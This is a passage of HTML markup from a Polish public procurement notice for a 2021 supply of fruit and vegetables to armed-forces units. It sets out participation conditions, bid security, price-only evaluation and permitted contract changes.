Pzp):16.1.	Wykonawca, który faktycznie będzie realizował dostawę, w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia musi posiadać wdrożony system, który spełnia wymagania zawarte w HACCP lub równoważny;16.2.	Wymagania jakościowe umowy podlegają nadzorowaniu jakości, realizowanemu przez właściwe miejscowo Zamawiającemu lub Odbiorcy akredytowane laboratorium lub laboratorium spełniające wymagania normy PN-EN ISO/IEC 17025;</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">15300000-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>03222000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>03221000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>03222110-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>03222200-5</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia">2021-01-01</span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'>2021-01-01 </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2021-12-31</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Wykonawca został dopuszczony do produkcji lub obrotu artykułami spożywczymi Ustawa z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (tj. Dz.U. z 2019 r. poz. 1252 z późn. zm.) i posiada aktualną decyzję lub zaświadczenie wydane przez właściwy organ urzędowej kontroli żywności - jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.Wykonawca posiada zgłoszoną działalność gospodarczą w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno-spożywczymi, do wojewódzkiego inspektora jakości handlowej artykułów rolno-spożywczych zgodnie Ustawą z dnia 21 grudnia 2000 r. roku o jakości handlowej artykułów rolno-spożywczych (tj. Dz. U. z 2019 r., poz. 2178 z późn. zm.), jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Wykonawca spełni warunek jeżeli wykaże, że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu (jeżeli okres prowadzenia działalności jest krótszy – w tym okresie), minimum jedną dostawę odpowiadającą swoim rodzajem dostawie stanowiącej przedmiot zamówienia na rzecz jednego Odbiorcy w ramach jednej umowy na wartościach nie mniejszych niż:a)	dla części nr 1 – 90 000,00 PLN,b)	dla części nr 2 – 55 000,00 PLN,c)	dla części nr 3 – 45 000,00 PLN,d)	dla części nr 4 – 15 000,00 PLN,potwierdzone dowodami, że została wykonana lub jest wykonywana należycie.Za dostawy tego samego rodzaju Zamawiający uzna dostawy innych warzyw i owoców UWAGA !Jeżeli Wykonawca składa ofertę na więcej niż jedną część przedmiotowego postępowania, zobowiązany jest wykazać wykonanie / wykonywanie ww. dostaw na rzecz jednego odbiorcy, w ramach jednej umowy na najwyższą z kwot określonych jako warunek udziału w postępowaniu wymaganych dla części, na które składana jest oferta. </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Dla części 1 – 5 000,00 PLN; Dla części 2 – 3 100,00 PLN;Dla części 3 – 2 700,00 PLN; Dla części 4 – 1 000,00 PLN.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Tak</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe">w postaci elektronicznej za pośrednictwem Platformy: https://platformazakupowa.pl/pn/12wog.</span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">3.	Zamawiający zgodnie z art. 144 ust. 1 ustawy przewiduje możliwość wprowadzenia zmian do treści zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy. Zakres przewidywanych istotnych zmian oraz warunki tych zmian:a.	zmiana Odbiorcy lub miejsca dostawy zgodnie ze wskazaniem właściwej instytucji wojskowej, wynikająca z potrzeb Sił Zbrojnych RP;b.	zmiana numeru konta, adresu firmy, w przypadku poinformowania Zamawiającego pisemnie o zaistniałej zmianie;c.	zmiana podwykonawcy uczestniczącego w realizacji umowy (jeśli Wykonawca wskaże podwykonawcę), pod warunkiem, że Wykonawca wykazując spełnianie warunków udziału w postępowaniu nie powoływał się na potencjał tego podwykonawcy. W przypadku powołania się na potencjał tego podwykonawcy, kolejny podwykonawca musi przedłożyć Zamawiającemu dokumenty potwierdzające spełnianie warunków w zakresie wymaganym od Wykonawcy, pod rygorem nie wyrażenia przez Zamawiającego zgody na zmianę podwykonawcy;d.	Zamawiający zastrzega sobie prawo zmniejszenia przyjętych w umowie ilości i częstotliwości dostaw, a także zmniejszenia ilości zamawianego asortymentu, w sytuacjach, których Zamawiający nie mógł przewidzieć w chwili jej zawarcia (np. restrukturyzacja sił zbrojnych, zmiany ilości żywionych żołnierzy). Wartością umowy będzie wówczas końcowa wartość faktycznie zrealizowanych dostaw. Zamawiający nie będzie ponosił ujemnych skutków spowodowanych zmniejszeniem ilości, częstotliwości i wartości dostaw przewidzianych w umowie.O zaistnieniu przyczyn powodujących konieczność zmian jak wyżej Zamawiający poinformuje Wykonawcę pisemnie z jednoczesnym przesłaniem projektu aneksu do umowy w zakresie zmian, w terminie 14 dni od powzięcia przez Zamawiającego wiadomości o wystąpieniu wyżej określonych przyczyn;e.	w szczególnie uzasadnionych przypadkach (np. osiągania wyższych stanów gotowości bojowej, szkolenia rezerw osobowych, likwidacji klęsk żywiołowych, restrukturyzacji sił zbrojnych, kryzysu, zagrożenia lub wojny lub innych zadań postawionych Zamawiającemu przez organa władzy państwowej), Wykonawca zagwarantuje bezpłatny dowóz towaru oraz w razie potrzeby zwiększenie ilości i częstotliwości dostaw przy zachowaniu tej samej ilości asortymentu (przy niezmienności wartości umowy) do miejsc stacjonowania jednostek wojskowych oraz innych miejsc wskazanych przez Zamawiającego.O zaistnieniu przyczyn powodujących konieczność zmian jak wyżej Zamawiający poinformuje Wykonawcę pisemnie w terminie do 7 dni od powzięcia przez Zamawiającego wiadomości o wystąpieniu wyżej określonych przyczyn. Zmiana nie wymaga aneksu, a jedynie pisemnego powiadomienia ze strony Zamawiającego wraz z określeniem podstawy zmian, czasu w jakim będą obowiązywały, miejsc dostaw i szacowanych ilości do realizacji w tym czasie. Wykonawca potwierdzi w ciągu 3 dni od daty otrzymania powiadomienia – przyjęcie do realizacji;f.	zmiana ilości produktów przewidzianych w umowie (zmniejszenie lub zwiększenie) lub zamianę danego rodzaju produktu na inny, ale wyłącznie taki, który jest objęty umową. Powyższe jest możliwe z zastrzeżeniem, że wynagrodzenie Wykonawcy nie może ulec zwiększeniu, a zmiany zostaną dokonane poprzez proporcjonalną zmianę ilości/ zamianę rodzaju produktów przy uwzględnieniu ich ceny jednostkowej. O zmianie tej Zamawiający poinformuje Wykonawcę z co najmniej 7-dniowym wyprzedzeniem podając zakres zmian, a Wykonawca zobowiązany jest do poinformowania (co najmniej faksem) przyjęcia powyższego do realizacji. Jeżeli wystąpi znaczna liczba zmian - co najmniej 1 x na kwartał – nie później niż do 10-każdego następującego miesiąca po upływie kwartału Zamawiający dokona analizy realizacji umowy w związku ze zmianami i opracuje aneks do umowy w tym zakresie.g.	możliwość realizacji dostaw, niezbędnych do zabezpieczenia żywienia po mobilizacyjnym rozwinięciu na zasadach określonych w aktach normatywnych z zakresu zabezpieczenia potrzeb mobilizacyjnych i wojennych Sił Zbrojnych RP w środki zaopatrzenia.h.	zmiana wysokości podatku VAT w zakresie przedmiotu zamówienia w wypadku ustawowych zmian w tym zakresie. Zmiana ta wymaga zachowania formy pisemnej (aneks) oraz pisemnego wniosku jednej ze Stron o zmianę wraz z uzasadnieniem. Korekty ilościowe i asortymentowe mogą następować w ramach jednego lub kilku zadań objętych zawartą umową z danym Wykonawcą.4.	W przypadkach, o których mowa powyżej wartością końcową umowy będzie wartość faktycznie zrealizowanych dostaw na dzień 31.12.2021 r. w ramach umowy.5.	Wszelkie zmiany dotyczące treści umowy dokonywane będą w formie pisemnej (aneksu do umowy) pod rygorem nieważności. Zmiany nie mogą powodować negatywnych skutków finansowych, jakościowych ani organizacyjnych dla Zamawiającego oraz wymagają wniosku strony o zmianę umowy wraz z uzasadnieniem.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o 